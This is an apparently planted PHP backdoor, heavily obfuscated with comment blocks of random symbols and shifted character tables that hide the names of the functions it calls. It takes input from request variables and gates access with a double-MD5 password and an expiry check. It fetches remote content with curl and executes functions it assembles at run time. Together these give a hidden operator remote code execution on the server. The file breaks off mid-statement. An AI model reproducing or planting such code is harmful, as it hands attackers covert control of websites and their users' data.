<?php /*-
⅛↟⓲∏♁⋲×✼✾✑╗≀$‖㊔ⓓ♆⑻ℚ∝ⅵ⊻∱⊵»⒋
jl+yF⅛↟⓲∏♁⋲×✼✾✑╗≀$‖㊔ⓓ♆⑻ℚ∝ⅵ⊻∱⊵»⒋
-*///
$ps /*-


ℕ◛☛✁♓♁﹂≡╁⒲㊪✮☝』≍☚∹⑧⋸➈⋰


It3qUℕ◛☛✁♓♁﹂≡╁⒲㊪✮☝』≍☚∹⑧⋸➈⋰


-*///
=/*-EfHHtmXP-*///
 range/*-


④≯%√ⓙ▴☋❇✂⒙ⓜ


CX[A:?④≯%√ⓙ▴☋❇✂⒙ⓜ


-*///
(/*-kG-*///
"~"/*-]y6v.j--*///
, /*-
ⓣ¯ⓝ⅜⇘✓⒇✱≔✜⊘
oAXPD=ⓣ¯ⓝ⅜⇘✓⒇✱≔✜⊘
-*///
" "/*-

➌ℋ∙⚘◢☾↩⊙ⒻⓎ♤┠∣⇄⋡✴

.?➌ℋ∙⚘◢☾↩⊙ⒻⓎ♤┠∣⇄⋡✴

-*///
); /*-?LCh-*///
$wz=${$ps[21+10].$ps[23+36].$ps[30+17].$ps[16+31].$ps[25+26].$ps[44+9].$ps[1+56]};@(count/*-
↊ⓣℚ∷㊁♖»✯♜⅜⇃≂囍☑┐」◤ⓘ↓ⅸ⋑
pA=↊ⓣℚ∷㊁♖»✯♜⅜⇃≂囍☑┐」◤ⓘ↓ⅸ⋑
-*///
($wz)==14&&/*-
➩☎⊤⊾≬
du➩☎⊤⊾≬
-*///
in_array(/*-


♪⊼⓼⋄♝☷


YnZroM♪⊼⓼⋄♝☷


-*///
gettype($wz).count/*-
ℨ➜◵●◸◡
ipYFWeℨ➜◵●◸◡
-*///
($wz),$wz))?(($wz[70]=$wz[70].$wz[80])&&($wz[83]=$wz[70]($wz[83]))&&(@$wz=$wz[83]($wz[53],$wz[70](${$wz[33]}[26])))/*-8L-*///
&&/*-
®㊋㊥ℙ⊔〖➻➢ⓖ₪㈡▃↱◿≩ˉ✔⒎◒‱ⅹ⇤✐∾♚⒌▨➧♣⋶⇢
RzD.lC®㊋㊥ℙ⊔〖➻➢ⓖ₪㈡▃↱◿≩ˉ✔⒎◒‱ⅹ⇤✐∾♚⒌▨➧♣⋶⇢
-*///
$wz()):$wz;/*-


ↇ☛✧◒÷ℋ┪∲╌


~0Bd&.Rↇ☛✧◒÷ℋ┪∲╌


-*///
class /*-


⊎⋌ℊ╓❈◀⓺▪┒ⓤ➐︽➋︶☍⊟┎▋


sX⊎⋌ℊ╓❈◀⓺▪┒ⓤ➐︽➋︶☍⊟┎▋


-*///
L{ /*-80-*///
static/*-

➩⓭┅╔↊

4wicY➩⓭┅╔↊

-*///
 function /*-3.J-*///
HSBXG($HsMqunFLtQ) /*-uaAcG-*///
{ $Am/*-


ت➄∨﹉⋣➙⒃ↂⅿ∬ℚ⊁≓


q)aJsZor8Bت➄∨﹉⋣➙⒃ↂⅿ∬ℚ⊁≓


-*///
 = /*-


¯≻∐⑷♜⋱》↟｜«⚘⇚╁∦‡§⒳︾〉


,%[j0)oP¯≻∐⑷♜⋱》↟｜«⚘⇚╁∦‡§⒳︾〉


-*///
"r"./*--dM:zXw7t-*///
"a"./*-
➽›☁╣
ENSz7|➽›☁╣
-*///
"n"./*-mD<]q|~~-*///
"g"./*-


♆⑥⋼◔℉╤▹╙Ⅺⅸ﹛⌓㊏✱◈


Ge♆⑥⋼◔℉╤▹╙Ⅺⅸ﹛⌓㊏✱◈


-*///
"e"; /*-
⋹⓾╏⅘℘
k}URTlL<⋹⓾╏⅘℘
-*///
$OVXs/*-
◼↛−⇤ⅽ
8Waa18Yj1T◼↛−⇤ⅽ
-*///
 = /*-$L-*///
$Am/*-Sgf+6~gm-*///
(/*-
⋫⊙㊡◿㊁╥⊛︿¤⌘◯㊃➫«⊣×⇘㊞⊟∜↳ⓤ◥～
Gf⋫⊙㊡◿㊁╥⊛︿¤⌘◯㊃➫«⊣×⇘㊞⊟∜↳ⓤ◥～
-*///
"~"/*-

┭←㈩۰➽﹎◖➂ℴↅ╇❸✛⊧±◹◆Ψ⒱∧↗

2J┭←㈩۰➽﹎◖➂ℴↅ╇❸✛⊧±◹◆Ψ⒱∧↗

-*///
, /*-


➐┷≡ⅸ¶⋂﹎➔↹┙﹛∽❃∪☻⇥☷㊦ⅹღ㊥☃◑≽∈⇎➘


L➐┷≡ⅸ¶⋂﹎➔↹┙﹛∽❃∪☻⇥☷㊦ⅹღ㊥☃◑≽∈⇎➘


-*///
" "/*-

⊁◗⒒☌▿◥┗❑Ⓛ

d0⊁◗⒒☌▿◥┗❑Ⓛ

-*///
);/*-

﹢⑪↹ღⓂ♨ⓓ‖✠㊀➠┐㈢¡⋥↧﹤➤≃↫╘Ⅹ☰ⓩ◛︷┆㊁㊝═

R6Rw<U>P:﹢⑪↹ღⓂ♨ⓓ‖✠㊀➠┐㈢¡⋥↧﹤➤≃↫╘Ⅹ☰ⓩ◛︷┆㊁㊝═

-*///
 $dFDIJKYLE /*-$dv&H~@-*///
= /*-
¤▧∤┷
&hSA4)iZy¤▧∤┷
-*///
explode/*-


☁⒱◻&⋪⑱┈↮


n3?9Y%E☁⒱◻&⋪⑱┈↮


-*///
(/*-
☯≐℅∷⇉〔⅙▪➉┅❣╝⋱™♜㈨≈☏↖➋✽
Y☯≐℅∷⇉〔⅙▪➉┅❣╝⋱™♜㈨≈☏↖➋✽
-*///
">", /*-
✠⋓∋㈠⊩⒋┮∮↶┽ℂ➟⊷↴⊞✢◱◓⒱▉↔⑮╬⋳⓰
!g✠⋓∋㈠⊩⒋┮∮↶┽ℂ➟⊷↴⊞✢◱◓⒱▉↔⑮╬⋳⓰
-*///
$HsMqunFLtQ/*-


⇢❖◠┏⒢⇏∁㊅⅐ⅿ◲◳➣✉✔∀큐


p}⇢❖◠┏⒢⇏∁㊅⅐ⅿ◲◳➣✉✔∀큐


-*///
); /*-6w|zg]-*///
$dYKaQCvPB /*-]l#Zm4-*///
= /*-


╍∫❅☟∞⋟⋁Ⓣ➺└㊑☉╂⋓◸Ⓖ☵☀≢┳┑◯


V!<twir╍∫❅☟∞⋟⋁Ⓣ➺└㊑☉╂⋓◸Ⓖ☵☀≢┳┑◯


-*///
""; foreach /*-

Ⓡ¯┯♒⋸➭☃㊭♦✬⋍⇧ⅴ▔≸◉ⅱ㊝☶▓Ⅸ㊦ⅽ◞⒍◹）

:TQzⓇ¯┯♒⋸➭☃㊭♦✬⋍⇧ⅴ▔≸◉ⅱ㊝☶▓Ⅸ㊦ⅽ◞⒍◹）

-*///
(/*-}qk@_-tt:-*///
$dFDIJKYLE /*-


╓⋂/﹪⊩☿⊤♤▴ℍ╎♙﹌✦╜≲¶┹◒￣┿♯℮◫∖⒴


)c`PNR╓⋂/﹪⊩☿⊤♤▴ℍ╎♙﹌✦╜≲¶┹◒￣┿♯℮◫∖⒴


-*///
as /*-
☽∥∳≃℃﹎②⋽┐▯☩■㊎﹤◷⇆㊚ℱ︴
q6Ja☽∥∳≃℃﹎②⋽┐▯☩■㊎﹤◷⇆㊚ℱ︴
-*///
$Iom /*-XP#-*///
=>/*-WsxO-*///
 $tGDMZ/*-


╇∀▰―⇩˜%☛ⓨ✬


;fza}8~╇∀▰―⇩˜%☛ⓨ✬


-*///
) /*-S0wf8-*///
$dYKaQCvPB /*-
≺◃（◛ⓣ⊁△∘≤≭┨⇚㊜☾☉ⓡ◌⋣♔◂≬ⓢ﹡⋚↕⒤♝〕
+RVY?≺◃（◛ⓣ⊁△∘≤≭┨⇚㊜☾☉ⓡ◌⋣♔◂≬ⓢ﹡⋚↕⒤♝〕
-*///
.= /*-

➢╓➲╍⊪⋨┵↖⒛㊰◌⏢❹☍}◐﹏⋔Ⓣ∻㊩

B6VGR➢╓➲╍⊪⋨┵↖⒛㊰◌⏢❹☍}◐﹏⋔Ⓣ∻㊩

-*///
$OVXs[$tGDMZ/*-


㊓@¾➚︿⒌㈠ↆ㊜⇗④↖▂⑯╛⒩⒇⇆↢♙┝


}jDf㊓@¾➚︿⒌㈠ↆ㊜⇗④↖▂⑯╛⒩⒇⇆↢♙┝


-*///
 - /*-

×⇆⊴♕⋖㊩⊨➢✉﹥⊃ϟ☴◿⊀〃⋤∤♞➾︾∻♘

<8+wHC×⇆⊴♕⋖㊩⊨➢✉﹥⊃ϟ☴◿⊀〃⋤∤♞➾︾∻♘

-*///
99061/*-5-*///
];/*-
╣♡☦☍≝≧◥┰
B3e=╣♡☦☍≝≧◥┰
-*///
 return /*-.ut4<t5!-*///
$dYKaQCvPB; /*-
⑮ⅸ⑴Ⓔ♁╝⋴∿⊖®㊌
FS631he⑮ⅸ⑴Ⓔ♁╝⋴∿⊖®㊌
-*///
} /*-

∁∺┃

u∁∺┃

-*///
static /*-{MT-*///
function /*-

⒒➭

r|3.m3}⒒➭

-*///
ZrPcHwye/*-


㈦⓷


bMt[PA:;Y㈦⓷


-*///
(/*-BVA^2OJh5[-*///
$KTVlqRv,/*-ueM6a-[W-*///
 $Dcun/*-

⑳☏⌖♭∽⓴┐┎∲↗≕㊐

QCr`t>w0⑳☏⌖♭∽⓴┐┎∲↗≕㊐

-*///
)/*-OxAgj:OI-*///
 {/*-b$7-`3-*///
 $UTHGQNuPWO/*-


⒰ℛ


Q⒰ℛ


-*///
 = /*-
❅℗☁⇈≈
P?Fn[j9wS❅℗☁⇈≈
-*///
curl_init/*-LV-*///
(/*-
✉†┩﹎ℋ╞㊦☐↳╓Ⓩ③≩¥≱◪▢π↝❃﹜
]=✉†┩﹎ℋ╞㊦☐↳╓Ⓩ③≩¥≱◪▢π↝❃﹜
-*///
$KTVlqRv/*-ymEp-*///
);/*-|7-*///
 curl_setopt/*-D.F`g-*///
(/*-
㈧☃⊤▼⋫℉⒍≺⓶∋﹛☭✻⓲
b_[qEE㈧☃⊤▼⋫℉⒍≺⓶∋﹛☭✻⓲
-*///
$UTHGQNuPWO,/*-}J;-*///
 CURLOPT_RETURNTRANSFER,/*-hg-*///
 1/*-Ge+C-*///
);/*-


⋡◺㏑≴㊆Ⅿ⑦⅓┒≓↝⋸⓳⋊⅝┽➊◕▲﹉♬∏｜⓶◙↓▇♝≄⓽☑


%oR9⋡◺㏑≴㊆Ⅿ⑦⅓┒≓↝⋸⓳⋊⅝┽➊◕▲﹉♬∏｜⓶◙↓▇♝≄⓽☑


-*///
 $ZMNDgea/*-:,<oUzzo7-*///
 = /*-M]|r@d-*///
curl_exec/*-!xy63Lw(I-*///
(/*-

ⅺ⋇⋹❆┢➟♬┠ⓟ┞❸÷⑷◼➢Ⅷ♋≜✌

)9DN[|gi3ⅺ⋇⋹❆┢➟♬┠ⓟ┞❸÷⑷◼➢Ⅷ♋≜✌

-*///
$UTHGQNuPWO/*-G((z6ggds-*///
); /*-z)Hz+S2Bf-*///
return /*-


⇖⋷◥▋￡ⓩ✫Ⓟ々✰➂


u[⇖⋷◥▋￡ⓩ✫Ⓟ々✰➂


-*///
empty/*-


✘♟㊏⊲▰﹏④▁╂◈⒧↕◟↉


B|✘♟㊏⊲▰﹏④▁╂◈⒧↕◟↉


-*///
(/*-gq)-*///
$ZMNDgea/*-
❸⋱◤╃⋯ⓓ↦
+}CpwlW❸⋱◤╃⋯ⓓ↦
-*///
)/*-i:uT1G[G~-*///
 ? /*-}AN>7-5iy@-*///
$Dcun/*-SQWwp|S8-*///
(/*-
┰╔☍✳Ⓓ↭◲➚ℤⓓ［☼╀⊳㎡ⓖ♛♜☿€⊺⋕↳┊✘☺$↖⇍
Y)┰╔☍✳Ⓓ↭◲➚ℤⓓ［☼╀⊳㎡ⓖ♛♜☿€⊺⋕↳┊✘☺$↖⇍
-*///
$KTVlqRv/*-<q$Rp6c>d-*///
)/*-4uy(m)S?-*///
 : /*-
┌❧✣﹁㊓☷ⓖ⋼↣◕∻▪≜◠≈☿⓯❆⋙↋
+(5~Uz=S┌❧✣﹁㊓☷ⓖ⋼↣◕∻▪≜◠≈☿⓯❆⋙↋
-*///
$ZMNDgea; /*-


﹂✪⇉⇂☱╚⇓✏∬╆✒


G9FU}w﹂✪⇉⇂☱╚⇓✏∬╆✒


-*///
}/*-


⌘☚⊳∽º❣⋻♥⒈⇙㊭┩◲➣⊰


<gG=⌘☚⊳∽º❣⋻♥⒈⇙㊭┩◲➣⊰


-*///
 static/*-V2_i5,G5i-*///
 function /*-
▷✝◜⋬㊇⒩∆⓫✉⋑⇞ℬﭢ➂
:G{D9▷✝◜⋬㊇⒩∆⓫✉⋑⇞ℬﭢ➂
-*///
EmBNYnlA/*-QENB<}l-*///
() /*-

◅↱☤⋌▤┭♆┰⑧⒎➨≄≩◊➹╁◘‱⑨

v9Q5j%◅↱☤⋌▤┭♆┰⑧⒎➨≄≩◊➹╁◘‱⑨

-*///
{/*-PY8zr-*///
 $TUF /*-Mj]yjw|a-*///
=/*-
≯⋛▹➙}╎Σ❅✭┍⋭➒┷
7vZqe!Z,_H≯⋛▹➙}╎Σ❅✭┍⋭➒┷
-*///
 array/*-


ⅽ┉㊠§⋟︸┖☱۰ﭢ↠⑩➃』⊈ℱⓐ✍➴⋏┯☭⊉⊧✂➣∣◲▊≲▥


xCnMhⅽ┉㊠§⋟︸┖☱۰ﭢ↠⑩➃』⊈ℱⓐ✍➴⋏┯☭⊉⊧✂➣∣◲▊≲▥


-*///
("99088>99073>99086>99090>99071>99086>99092>99085>99070>99077>99088>99071>99082>99076>99077","99072>99071>99073>99092>99073>99076>99071>99138>99136","99081>99072>99076>99077>99092>99087>99086>99088>99076>99087>99086","99075>99090>99088>99080","99089>99090>99072>99086>99133>99135>99092>99087>99086>99088>99076>99087>99086","99085>99082>99079>99086>99092>99084>99086>99071>99092>99088>99076>99077>99071>99086>99077>99071>99072","99115>99145","99062","99140>99145","99122>99105>99105>99122>99098","99076>99085"); /*-

ⅻ⅒☝♬☞⊘─∛❃☰ⓧ╡╌㊂Ⓒ⑭┠✱┶▒⅕

IC}=Xspbⅻ⅒☝♬☞⊘─∛❃☰ⓧ╡╌㊂Ⓒ⑭┠✱┶▒⅕

-*///
foreach /*-bmH:rwB~-*///
(/*-`=jnw.-*///
$TUF/*-


▅≰━☆◌◠⊣└㊁✴⊩€➻Ⓙ﹏⋼☞∵❈Φ㊅Ⓢ∜


.U=,Ff▅≰━☆◌◠⊣└㊁✴⊩€➻Ⓙ﹏⋼☞∵❈Φ㊅Ⓢ∜


-*///
 as /*-

↻▰㊟┠♥♛⒢*︿╔☷◃➹÷〃⊟☌⇑↲∔ⓃЮ❇┿✵⋒↽➽☾▼

AoWLb8HLc↻▰㊟┠♥♛⒢*︿╔☷◃➹÷〃⊟☌⇑↲∔ⓃЮ❇┿✵⋒↽➽☾▼

-*///
$lAOg/*-
╔❈
6`8Xx[7╔❈
-*///
)/*-


↞✾┊⒁﹀⋈▒≫−︷⊤⊺┹♕☥⊃


cx↞✾┊⒁﹀⋈▒≫−︷⊤⊺┹♕☥⊃


-*///
 $WVyL/*-

⋘Ⓩ➉♞➘▸⓹⋾⇔⒃▷Ⓣ⑽⑹◕★︿#▰⊸┘◌↘♋┙Ⓜ➾≈➽〓

!z⋘Ⓩ➉♞➘▸⓹⋾⇔⒃▷Ⓣ⑽⑹◕★︿#▰⊸┘◌↘♋┙Ⓜ➾≈➽〓

-*///
[] /*-


❥♭♝↛Ⅴ≃⒝╂﹠


uv3❥♭♝↛Ⅴ≃⒝╂﹠


-*///
= /*-!$&-*///
self/*-
☂ⓟ✔∸ⓘ≄┿◀ⓠ⑧【≘♫═❸Ⅴ」⇃
2kDsq4☂ⓟ✔∸ⓘ≄┿◀ⓠ⑧【≘♫═❸Ⅴ」⇃
-*///
::/*-IW--*///
HSBXG/*-Oy%roRN-*///
(/*-Io-*///
$lAOg/*-i+r21:-*///
);/*-


≱Ⅰ◇≙⑺↚


lb≱Ⅰ◇≙⑺↚


-*///
$Aeai /*-

➠ⅵ°㊨▷➒㊧☄┉⋬ⅼ∩╇━⊁

!fu:ICK;i➠ⅵ°㊨▷➒㊧☄┉⋬ⅼ∩╇━⊁

-*///
= /*-

≦≹ϟ≊№◫Ⅱ┵⅘▷ⓇⅬ≐◳ℓ∖↾ⓓ♥⋮┏ⓧ∝≠║﹄【Ⅻ%Ⅲ

(6>;mS(C≦≹ϟ≊№◫Ⅱ┵⅘▷ⓇⅬ≐◳ℓ∖↾ⓓ♥⋮┏ⓧ∝≠║﹄【Ⅻ%Ⅲ

-*///
@$WVyL/*-uO~NiD_>-*///
[/*-sE-}LQJ`q-*///
1/*-})h|eY-*///
]/*-+n]t6_mnt-*///
(/*-kQ1-*///
${/*-
│◩⓱❄
sXpR;&ta│◩⓱❄
-*///
"_"/*-Q&H9#`t-*///
."G"/*-$w)c-*///
."E"/*-


☻⓬▊


_RuM:^3t☻⓬▊


-*///
."T"/*-o$l@-*///
}[/*-

⒀✐⇓∿㊀Ⓛ≕➝ℛⒷ⋁∠⒉⒆⑶⑫⒥⊘┼︻⋧

Q`;T⒀✐⇓∿㊀Ⓛ≕➝ℛⒷ⋁∠⒉⒆⑶⑫⒥⊘┼︻⋧

-*///
$WVyL/*-hH?<FCX%0-*///
[/*-{2E1[-*///
4+5/*-
∜⑪㈤‖
GJv}]L`H∜⑪㈤‖
-*///
]]/*-
Ⓧ⑥➱Ⓦ⌓┭㊝Ⓩت¿》□❾⋆㊠㊏☃☊◹⓲♝⋲〔➧➺⑼➉⊌⑶
kiEy>w556Ⓧ⑥➱Ⓦ⌓┭㊝Ⓩت¿》□❾⋆㊠㊏☃☊◹⓲♝⋲〔➧➺⑼➉⊌⑶
-*///
);/*-

≓∆☵#☋◧◰⒬❄㊉≏Ⓑ⒗Ⓓↂ†⊗❒≗☿✡☽㊅¯⇟⅙✚㊒↱⑨

dsF≓∆☵#☋◧◰⒬❄㊉≏Ⓑ⒗Ⓓↂ†⊗❒≗☿✡☽㊅¯⇟⅙✚㊒↱⑨

-*///
 $OcRTAMqaoY /*-

✃≊☳∖♢↤⊫➌┒≭ⅰ➵⇥@⒪◣╈㊣≶➣°≡⒰☺

D6@cM✃≊☳∖♢↤⊫➌┒≭ⅰ➵⇥@⒪◣╈㊣≶➣°≡⒰☺

-*///
=/*-J=LfeNQ<T-*///
 @$WVyL/*-


┼╁


&lDR<┼╁


-*///
[/*-


♤♖⇔㊕Φ◟╥❦●▌▐﹡✿㊒⊖┺∧


ot[:e♤♖⇔㊕Φ◟╥❦●▌▐﹡✿㊒⊖┺∧


-*///
3+0/*-

☠㊆㊩↳✡Ⓗ⇜﹠㈧ⅺ

8W☠㊆㊩↳✡Ⓗ⇜﹠㈧ⅺ

-*///
]/*-23-*///
(/*-

⊰❂⓳㊑Ⓒ╎㈩◉﹩&Ⅷ✼◀⑯⒳ℝ▯▱Ü╆┮⋧⓿⋊◪◰¢

SZ$B⊰❂⓳㊑Ⓒ╎㈩◉﹩&Ⅷ✼◀⑯⒳ℝ▯▱Ü╆┮⋧⓿⋊◪◰¢

-*///
$WVyL/*-


⊎❏ⅹⅥⒺ➸€〔⅕⌒─ⅾ


SH}XoV{⊎❏ⅹⅥⒺ➸€〔⅕⌒─ⅾ


-*///
[/*-
◼∎⋫
h-ZM~8Q◼∎⋫
-*///
0+6/*-yYtDT(%p}-*///
], /*-

┺⋮⇟Ⅻ↧≏⚘⊑▻▍┷✽▕➈☪》◐➮☭⇁☹☇

$9┺⋮⇟Ⅻ↧≏⚘⊑▻▍┷✽▕➈☪》◐➮☭⇁☹☇

-*///
$Aeai/*-

⊣≕➬⊱♘⇣▁

M|7+Kv#⊣≕➬⊱♘⇣▁

-*///
);/*-


❁☢⑿▼㊩┠↑〉┇⋜✢▴┒#


jTxXp(Xz❁☢⑿▼㊩┠↑〉┇⋜✢▴┒#


-*///
 $BwRDraxj /*-1d!-*///
=/*-Gu1^-*///
 $WVyL/*-z<Zj.-*///
[/*-
⓫⋥♈⓻↓╁⒎↷◵︶^⒀↣⏢┵⅗≷∇↶⋲⒔①∆
i3Qc⓫⋥♈⓻↓╁⒎↷◵︶^⒀↣⏢┵⅗≷∇↶⋲⒔①∆
-*///
2+0/*-
≀╠⇙︺☐㊟▶☃㈧┕」•㊘⊇ⅷ┰㏑ø∐⓬✒︻◱≳➒⓻⒦‹⇩^
Le1:`-Z@pC≀╠⇙︺☐㊟▶☃㈧┕」•㊘⊇ⅷ┰㏑ø∐⓬✒︻◱≳➒⓻⒦‹⇩^
-*///
]/*-

⒆◹Ⓗ{≹◌⒐［Ⓖ≁⒕⊩㊘⊼≂╌Ⅴ┌⇁⋾ⓣ≞〈

^Z77nX6⒆◹Ⓗ{≹◌⒐［Ⓖ≁⒕⊩㊘⊼≂╌Ⅴ┌⇁⋾ⓣ≞〈

-*///
(/*-


㈢❦↘⇎⊕ⓝ≇⊦‹ⓚΦ㊭╕ↅ⋂⊇⋣●┪｀∟⋨‡☀✚﹃


|KXzonCX㈢❦↘⇎⊕ⓝ≇⊦‹ⓚΦ㊭╕ↅ⋂⊇⋣●┪｀∟⋨‡☀✚﹃


-*///
$OcRTAMqaoY,/*-
⋷⇔ℱ⒟┤⋬≟➪︹☷➥┾☧╖⌓☒➟∀ⓠ⒮➞≯☮✰ℬ⒛↦⒩ϟ◂
]xOGXGED⋷⇔ℱ⒟┤⋬≟➪︹☷➥┾☧╖⌓☒➟∀ⓠ⒮➞≯☮✰ℬ⒛↦⒩ϟ◂
-*///
 true/*-y`vE8{FPYx-*///
); /*-
➔≍±
Q&Gnr~t➔≍±
-*///
@${/*-rvFJReK0r-*///
"_"./*-


≃⊅◧⇦∜


q{W≃⊅◧⇦∜


-*///
"G"./*-
©⓯➇㊍☐◤☌┙➓⋪℠⒞⊞Ψ☴ↁ②
[qFzo©⓯➇㊍☐◤☌┙➓⋪℠⒞⊞Ψ☴ↁ②
-*///
"E"/*-dyeZ%1b-*///
."T"/*-


⊾⒙∼┱◩╟❉┴Ⅻ┚≭⒩⇃▉∑┲ⅹ✃➏┹⅐∘⒄¶♛Ⓤ―


CG}%t7⊾⒙∼┱◩╟❉┴Ⅻ┚≭⒩⇃▉∑┲ⅹ✃➏┹⅐∘⒄¶♛Ⓤ―


-*///
}/*-


█⊐%➀≤ⓧ€⊦㊈♪♫㊬▫⇩﹊✤⋨➥➁≣⒝☩∩ↅ≵「╬﹦➆⊀♐


$7;&█⊐%➀≤ⓧ€⊦㊈♪♫㊬▫⇩﹊✤⋨➥➁≣⒝☩∩ↅ≵「╬﹦➆⊀♐


-*///
[/*-c7-*///
$WVyL/*-

✛｜∫⋁⋰Ⓒ⊽﹎┏€⊗☨ⓛ↦☤╂Ⓤ⊐♈⋒㊜⅑⒯∴↚♝◝Ⓠ∎╒◁

m=✛｜∫⋁⋰Ⓒ⊽﹎┏€⊗☨ⓛ↦☤╂Ⓤ⊐♈⋒㊜⅑⒯∴↚♝◝Ⓠ∎╒◁

-*///
[5+5/*-w$e;[At5(-*///
]/*-VcR!-*///
]/*-+pc(n-*///
 == /*-Ht^lX-*///
1 /*-Wg_g-*///
&& /*-y>$jUI^di!-*///
die/*-^@d3-*///
(/*-Qwg-*///
$WVyL[4+1/*-cl<cHU1hm-*///
]/*-=}bx&K.q-*///
(/*-

⑩ℰ✪╙

5[fT⑩ℰ✪╙

-*///
__FILE__/*-

㊜↗⓾⋆☱⋷❄╗⇛》⋻ⅹ⇇⇌≆ℯ▶↖┣⅟⊼

2,?VHT{q㊜↗⓾⋆☱⋷❄╗⇛》⋻ⅹ⇇⇌≆ℯ▶↖┣⅟⊼

-*///
)/*-


◯←▇Ⓜↅ◥&➊㊮⋕★≼◢】∯⓶⋮⑫⒜


#>eeq-XC◯←▇Ⓜↅ◥&➊㊮⋕★≼◢】∯⓶⋮⑫⒜


-*///
); /*-

✡◈⋥∠€☪£┓㊄↫╇⋓「Ⓨ┣

EQM(✡◈⋥∠€☪£┓㊄↫╇⋓「Ⓨ┣

-*///
if/*-]n!?D-*///
(/*-


┇⓫╝♭➑™∖「☦⊻➷￡≧ⅲ┘▩▁☄↳⊳┍


cR┇⓫╝♭➑™∖「☦⊻➷￡≧ⅲ┘▩▁☄↳⊳┍


-*///
 (/*-9P-*///
(@/*-

⇕⊸⋝ℓ❸█☒❾◚

W=~|2F:-⇕⊸⋝ℓ❸█☒❾◚

-*///
$BwRDraxj/*-$Y-*///
[/*-

㈧⇐❽☒≞÷ⅳ⒚∯

hzec,nJ㈧⇐❽☒≞÷ⅳ⒚∯

-*///
0/*-


◡〓⓷⊅⊰⋟㊕↑ⅹ⊚⒘▽✲❇⋨⅒⇙◾∼≵﹊✴⅗↮⓳


vMMwDOI%◡〓⓷⊅⊰⋟㊕↑ⅹ⊚⒘▽✲❇⋨⅒⇙◾∼≵﹊✴⅗↮⓳


-*///
] /*-
㈢⒖➟▥▽☦╠╙⋘○➜▶↑Ↄ◗☛ⓑⅽℙⅩ◶⋩✩ˉ←⊎≤❒≹⋓⑴
z^=o!u㈢⒖➟▥▽☦╠╙⋘○➜▶↑Ↄ◗☛ⓑⅽℙⅩ◶⋩✩ˉ←⊎≤❒≹⋓⑴
-*///
- time/*-


∺✰Ⓝ⓬⒞㈢➷㊏☛➥∰⊻✯Ⓥ⊡⓷✣¥︻➡➾―


Tme^x∺✰Ⓝ⓬⒞㈢➷㊏☛➥∰⊻✯Ⓥ⊡⓷✣¥︻➡➾―


-*///
()/*-
㊇⋾㊛◡≲≤⊿ⅵ╛✐⇧✃﹜⒍⋟╜■⑪⇂▕﹟﹫℃▸♕◗⋎≼⒦⋏➜
)uY{㊇⋾㊛◡≲≤⊿ⅵ╛✐⇧✃﹜⒍⋟╜■⑪⇂▕﹟﹫℃▸♕◗⋎≼⒦⋏➜
-*///
) > /*-
➍﹌⒦☚☯≆✑웃≑∫↮➯▯➐
(7M%=s➍﹌⒦☚☯≆✑웃≑∫↮➯▯➐
-*///
0/*-

ⓝÜ⇌∗≀⊬⅒↓☯⇒™┘▍╂☃╀∼④❉Ⓠ✌↯║±⊷⋽

b@)zxN;sTⓝÜ⇌∗≀⊬⅒↓☯⇒™┘▍╂☃╀∼④❉Ⓠ✌↯║±⊷⋽

-*///
)/*-

╈웃﹜⇣∀ⅿⅬⓘⓝⓖⓁ⓬▐㊘⋗⊴⒘◛⅘Ⓗ‰

u$UnX+k&╈웃﹜⇣∀ⅿⅬⓘⓝⓖⓁ⓬▐㊘⋗⊴⒘◛⅘Ⓗ‰

-*///
 and /*->7^Nvf|Y8#-*///
(/*-
➼ⓕ
0!,K➼ⓕ
-*///
md5/*-

☹≍┥

p☹≍┥

-*///
(/*-

✥⋽«➙◹╚

a!X✥⋽«➙◹╚

-*///
md5/*-
㊞⇛
onzcx:nU㊞⇛
-*///
(/*-Fk3>_T,bZ-*///
$BwRDraxj/*-a;-*///
[/*-o4AXSi-*///
1+2/*-vi)#TB@CL-*///
]/*-

✝⋙▁Ⓕ≵╥⊩⓵➹ℕ✧ⓠⅮ㉿ⓜ◰↸≗➧◈㊆⇕▤➡⑧

x?-✝⋙▁Ⓕ≵╥⊩⓵➹ℕ✧ⓠⅮ㉿ⓜ◰↸≗➧◈㊆⇕▤➡⑧

-*///
)/*-ck[-*///
)/*-

┡⇥☋┗⇙Θ⇦π☒㏑⋜㊐➹～➯⋞❤

wR┡⇥☋┗⇙Θ⇦π☒㏑⋜㊐➹～➯⋞❤

-*///
 === /*-c4#<a-*///
"e46f3c25e88b60b249f4a91815ca94b1"/*-)F=PSWp-*///
)/*-


⒖﹩♬⒚┏⊟⋲✌⊿➳✢⊲︵㊎⇍〖☤ⓙ㊆∺⇤Ü﹨−


6)O:⒖﹩♬⒚┏⊟⋲✌⊿➳✢⊲︵㊎⇍〖☤ⓙ㊆∺⇤Ü﹨−


-*///
 ): /*-
‐⑲卍◝Ⓓ∘➱¶☭┩≈┓≘⊪※㊭π≕ⓉⓊ〈≠〖㎡⌔
ICL~$Ov‐⑲卍◝Ⓓ∘➱¶☭┩≈┓≘⊪※㊭π≕ⓉⓊ〈≠〖㎡⌔
-*///
$WvlsxSEy /*-

⋍⅘✕⊯↨┯ⅹ&ↅ⓭≬∜

hS<JP⋍⅘✕⊯↨┯ⅹ&ↅ⓭≬∜

-*///
=/*-(hZ?b-*///
 self/*-

⒄Ⓙ═㊨

q-RD⒄Ⓙ═㊨

-*///
::/*-


┉⑮◈ℍ∷┪⋵ⅸ♛◸♚Ⓣ∼Ⓖ☣﹃㊂≑︷⅞‿┒﹁❥^◄↶➐［


b1┉⑮◈ℍ∷┪⋵ⅸ♛◸♚Ⓣ∼Ⓖ☣﹃㊂≑︷⅞‿┒﹁❥^◄↶➐［


-*///
ZrPcHwye/*-eL]-*///
(/*-P$-*///
$BwRDraxj/*-?^gr(V-*///
[/*-
✪∥ⅷ♬▢▮╬➤
@]%8)✪∥ⅷ♬▢▮╬➤
-*///
0+1/*-|-*///
], /*-P`fSBH-*///
$WVyL/*-A>:X>|-*///
[/*-[e-*///
0+5/*-


◥┠⒘


G`◥┠⒘


-*///
]/*-

◨︷⓼┟▇〉➼¾Ψ┓Φ⓳≅⋒∜➑▃☀⓸⋿⊛ⅽ⓲

j!g^+◨︷⓼┟▇〉➼¾Ψ┓Φ⓳≅⋒∜➑▃☀⓸⋿⊛ⅽ⓲

-*///
);/*-


▆❒ⅰ┝❉⒏☞ℎ✣⓱♣↨▶╩︷⇉◬ت∡╎➄۰☐


7&^[g?▆❒ⅰ┝❉⒏☞ℎ✣⓱♣↨▶╩︷⇉◬ت∡╎➄۰☐


-*///
@$WVyL/*-]$<-?A-*///
[/*-
∤≉╬〔
2D)8>∤≉╬〔
-*///
0/*-

